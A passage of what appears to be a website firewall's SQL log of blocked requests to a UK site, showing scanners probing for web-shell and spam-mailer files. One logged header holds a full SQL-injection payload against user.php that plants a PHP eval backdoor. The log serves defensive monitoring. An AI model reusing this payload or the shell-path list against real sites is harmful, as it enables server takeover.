AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','6OZPFH79XloU1RYhDwK0ucmA',0,1673883704.8694,226,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Bk3MKtxUdXGqWw872u5gz1ZJ',0,1673883708.2316,174,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','dlbI6VK2GRxtzcuwFHOJMXYi',0,1673883750.5028,216,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Vef13aYrJFdSEpXZiB9ytNhn',0,1673883852.2876,198,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rRMg8Hnkz5aFxQwYl7VWUP2Z',0,1673883855.6405,171,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"python-requests\\/2.27.1\"}','hcZSHk8OzLRMm9bxIFf5U2JY',0,1673884667.2655,215,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"python-requests\\/2.27.1\"}','QKluIYfdA95CV1jXbqgNBzZr',0,1673884671.2020,179,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"python-requests\\/2.27.1\"}','m0C3UxpcLjzWTPa5dA9vJsFO',0,1673884682.9836,241,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.27.1\"}','B4kq9hsvdomwO8KbpL1F62el',0,1673884684.1194,243,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/content.php','','{\"1\":\"python-requests\\/2.27.1\"}','CRLMEYiPWkKw0c9zQ2doZSe3',0,1673884685.1590,177,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"python-requests\\/2.27.1\"}','QkmHpxMwNSqRolTdLIXUGEK4',0,1673884686.1710,188,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"python-requests\\/2.27.1\"}','BEHpvm4r0WwX97ageJNYFLZD',0,1673884687.0481,186,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.27.1\"}','Pb6glUoF1h8wWHBasxND7pC0',0,1673884687.9095,169,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.27.1\"}','pgSQOUdK0fk4JXwjaIGs7ohn',0,1673884689.1225,194,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"python-requests\\/2.27.1\"}','ay1UXZSe6vVwmCdG7O5tzrDf',0,1673884689.9799,206,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"python-requests\\/2.27.1\"}','cVnMtf5vuPKJxGhNjWDeQ93y',0,1673884691.3604,173,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"python-requests\\/2.27.1\"}','asB9LEOU4PgWD6RXfJYne1zN',0,1673884692.1953,200,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.27.1\"}','UKyvPeN9d6BLGqXJCnc0DEpi',0,1673884692.9754,252,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.27.1\"}','VaKXN38Ppb10ei6JRjTGUftY',0,1673884693.8264,189,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.27.1\"}','mcP6tTUqXJl7FCAhE05Nwgrp',0,1673884694.6918,172,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','QmkAnyDO5TdetVzb6KFhPxuC',0,1673884695.4290,160,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.27.1\"}','d8atbVYCLp1sNTEqiZzcPryj',0,1673884696.8376,165,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.27.1\"}','7koJyGi5RprfCTtxVvIW4EDM',0,1673884697.5866,182,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.27.1\"}','AtNXVlO5TyespLvPI0SZmFcz',0,1673884698.4551,171,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"python-requests\\/2.27.1\"}','QvraqtXlMZYFERn42j9SyGkx',0,1673884699.1078,156,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','FGUysNVDxp94dAYRfT3EamXc',0,1673884701.9179,185,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.27.1\"}','BK8QF9UGHagYwiOClcL7sIbq',0,1673884702.7780,180,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/export.php','','{\"1\":\"python-requests\\/2.27.1\"}','mJKgU0BcwYNkbEih15tdVyMS',0,1673884703.7117,173,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.27.1\"}','JmI8nrNQgjthyq6vB5eLDx7T',0,1673884716.1298,200,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.27.1\"}','YD8eRSwfdut0IM1JNgHsik5m',0,1673884717.3682,172,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','FzBEjHmrPneDpJabG2o6huQA',0,1673884718.3502,173,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','M9gOX06v12tmwG5KsTWcYlyL',0,1673884719.1534,188,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/alwso.php','','{\"1\":\"python-requests\\/2.27.1\"}','4Y2iLVKvU5GosaJgTwMqx9X1',0,1673884720.0152,185,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.27.1\"}','mxSWEYdjAJ9LkKCIotZbT8zn',0,1673884720.9438,183,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"python-requests\\/2.27.1\"}','j1HvSMPT7nB0mpDuYtExWL6F',0,1673884726.9631,164,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.27.1\"}','n8XGhBdkJLPZEce0iIgNYV39',0,1673884734.9516,164,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/lufix.php','','{\"1\":\"python-requests\\/2.27.1\"}','iKreYckEygl2V7AQ6aupLFB1',0,1673884735.6860,192,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZaqRdSQAC4IXL5OkpjfYg6no',0,1673884742.1346,223,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"python-requests\\/2.27.1\"}','hCwl85vQs7R3To4ExaJN1kKg',0,1673884742.9483,185,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.27.1\"}','npZgaoQsuxAtW0fU89EwcB2k',0,1673884743.7186,171,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"python-requests\\/2.27.1\"}','eGF4b7Qm29lDi1dq0gZXN6OM',0,1673884744.8919,206,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.27.1\"}','JdhFK2XbypHxrRz0wU5lBSCg',0,1673884745.8337,195,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.27.1\"}','ERl6IMog37knC4DzSApTsxyf',0,1673884747.1409,179,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.27.1\"}','lWBe83w9xEVS5ZdfbtROvjCy',0,1673884748.0842,161,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"python-requests\\/2.27.1\"}','Xk6wsY9jn2tSgE35TOyZKvcp',0,1673884748.7749,192,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/1975.php?shell=1975','','{\"1\":\"python-requests\\/2.27.1\"}','Adk9WmZ7iNLRnzBVslp2ET3w',0,1673884749.5528,168,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.27.1\"}','jSsZGiUBPVuYOpo3eA9dRMWH',0,1673884750.3954,191,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/autoload_classmap.php','','{\"1\":\"python-requests\\/2.27.1\"}','4pGuUxefE1NS9YbJdHAiXWLa',0,1673884751.2249,171,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','2TvErABioHwjXumsSfIpDbK7',0,1673884751.9771,175,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','SBdta8rlz4fD73GOANsgWRYj',0,1673884754.5506,171,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/images/vuln2.php','','{\"1\":\"python-requests\\/2.27.1\"}','z0Spua2kBQGCYlHANVit3wPb',0,1673884756.4052,227,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/tmp/vuln2.php','','{\"1\":\"python-requests\\/2.27.1\"}','YfkrxqIWF5dhCDnJS9uK8T3O',0,1673884757.6446,179,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.27.1\"}','Pn8dIf57it3NAm4SxZbLgUuq',0,1673884758.6290,184,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"python-requests\\/2.27.1\"}','gpGb7EFT8HkmjPOZ6sJYt1Mw',0,1673884759.9027,188,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"python-requests\\/2.27.1\"}','KDIGNzXB0qTO5ndvFhig1QUM',0,1673884771.7149,188,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.27.1\"}','pqzaU6t2Qu4LZ3wnRNgYCs9G',0,1673884785.0886,206,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.27.1\"}','Bn3NhDziGeFbfgMJL5XdVEot',0,1673884785.9721,196,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.27.1\"}','YngZkxmGXOQaP7zlUsuL4CBp',0,1673884786.8520,333,'','GET',403,0,700,0,1,'',0),('172.174.97.185',2897109433,'','https://dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.27.1\"}','a6qDFKwYE1cJAhfQBPbOHVsv',0,1673884787.8379,176,'','GET',403,0,700,0,1,'',0),('107.189.31.198',1807556550,'','https://www.dailyjolly.co.uk//user.php?act=login','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\",\"2\":\"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\\"num\\\";s:288:\\\"*\\/unionselect1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10---\\\";s:2:\\\"id\\\";s:3:\\\"\'\\/*\\\";}\"}','MwyJgh73bpES9rRLIxGdU15u',0,1673887052.3776,162,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SoOr3dHQMNgACpfZx79hyknI',0,1673890250.1807,203,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','phYA7IrUeOwcTHkzKZSg142F',0,1673890250.4632,176,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wPIHCbW14FEKZANoa0tui7Jp',0,1673890250.7028,181,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LoDhEreA1TI84PpUysMd6Kwx',0,1673890250.9549,192,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vlnBLmOkr14ewXCzYuGqREpT',0,1673890251.2372,175,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/alpha.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rIh9J2C8Sicuoaw1vbQVTznM',0,1673890251.4973,172,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XuRo5fCgpMDKG9QxJ7Tz4sHk',0,1673890251.7452,165,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qk2wLH04lXrNOjyc783btfGg',0,1673890251.9825,160,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','muEa6dpRg0PybjsZFkT1BMz5',0,1673890252.2003,197,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MGjntkw3J20HqCWE45QxugSh',0,1673890252.4618,171,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/sender.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ux5OZQ2g63MN8fbTs1daU4Ge',0,1673890252.6908,188,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/inbox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gRoEDn4Yj5IAysKVbuwrMStP',0,1673890252.9472,170,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','A1i9I2RZ6XhJGQVubawySKrM',0,1673890253.1754,174,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dAp5hjEfgbsN4HWUViQKLCvF',0,1673890253.4172,161,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y9IY6ZVkoaSiHjOu1l0QrqJm',0,1673890253.6423,197,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Sh3bONEgrjKQDZ2n4qpzvtGa',0,1673890253.9197,172,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/test.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','t9pumOHVU23TGhgbNx7Irayf',0,1673890254.1666,167,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YQSNUhs2dzRin60XfvVJGZu4',0,1673890254.4078,190,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FfLlAgMIZBtOpqQCukDRdsYb',0,1673890254.6732,168,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i5jPJbgOYvq2sA8yKz1xTLhc',0,1673890254.9233,168,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Zi8MYLFm0lqbgrxUVB7jt4pN',0,1673890255.1681,178,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vKoGQOnStciPkheJXWEC5xwu',0,1673890255.4350,183,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','l6oP0zWNpqeEQbkLV459xZFv',0,1673890255.6954,176,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JzvfAbUwghPTRlCWIp7LSsaj',0,1673890255.9511,216,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','X3mAFCkl7WDo4BuJNQETLjOr',0,1673890256.2476,189,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','P37r0AEleqhY6CHmSnf2Owxg',0,1673890256.4960,183,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','83ypsovqlQHkhfO9TPWV7jZ2',0,1673890256.7473,179,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mYf7ZH9gLxdBz3TDjhG2ibae',0,1673890257.0049,177,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TM7qAUpceCW4ElLHY2S9Bj63',0,1673890257.3696,209,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BbQZquwhnOGHeIkExU031XrK',0,1673890257.6388,174,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nZ1GWsPO3YhxrQajDcvgltqy',0,1673890257.8906,173,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EH4w0LBiqCDVaOlzgfve8xZT',0,1673890258.1293,166,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ai0cdlaWwoDrjUQkNXJ4fL6q',0,1673890258.4458,185,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TDrCBJdbE2ZpPNK0nXuwgvHx',0,1673890258.7015,213,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2AcfYQNqwmD0aeb8CRUTvuJt',0,1673890258.9828,170,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ehdXCDNM8Jtcay63LKQEnOIj',0,1673890259.2292,205,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','E5t2Bfo7XGjUrL4JN3Q6Dy1u',0,1673890259.5082,191,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KSBCTq5nLNukAhVdgtWXwx4P',0,1673890259.7866,180,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 